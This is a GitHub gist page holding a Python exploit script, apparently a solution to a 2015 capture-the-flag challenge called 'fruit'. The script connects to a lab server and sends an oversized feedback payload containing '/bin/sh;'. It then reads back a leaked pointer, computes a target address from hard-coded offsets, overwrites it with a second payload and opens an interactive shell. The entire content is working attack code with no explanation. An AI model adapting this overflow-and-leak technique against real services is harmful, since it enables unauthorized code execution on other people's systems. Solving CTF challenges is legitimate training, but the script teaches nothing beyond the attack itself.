Skip to content

Instantly share code, notes, and snippets.

@peternguyen93

peternguyen93/matesctf_round2_fruit.py

Created November 29, 2015 05:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save peternguyen93/a9cf7993208460e59935 to your computer and use it in GitHub Desktop.
Save peternguyen93/a9cf7993208460e59935 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
matesctf_round2_fruit.py
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
p = Pwn(mode = 1,host='lab02.matesctf.org',port=4231)
# p = Pwn(mode=1)
def exploit():
p.connect()
payload = 'A'*2064 + '/bin/sh;'
payload = payload.ljust(2168,'A')
# raw_input('Debug>')
p.read_until('>>')
p.write('2\n')
p.read_until('Choose fruit id:')
p.write('1\n')
p.read_until('>>')
p.write('4\n')
p.read_until('Size of feedback message:')
p.write(str(len(payload)) + '\n')
p.read_until('Content:')
p.send(payload)
p.read_until('>>')
p.write('3\n')
l = p.read_until('>>')
s = l.index('A\n')
addr = p.unpack(l[s + 2:s + 8].ljust(8,'\x00')) - 0xd44 - 6201344 + 0x46640
print hex(addr)
# raw_input('Debug>')
payload = 'A' + p.pack(addr) + '\x00'
p.write('\n')
p.read_until('>>')
p.write('4\n')
p.read_until('Size of feedback message:')
p.write(str(len(payload) + 1) + '\n')
p.read_until('Content:')
p.send(payload + '\n')
p.read_until('>>')
p.write('3\n')
# print p.read_until('>>')
# p.write('5\n')
p.io()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment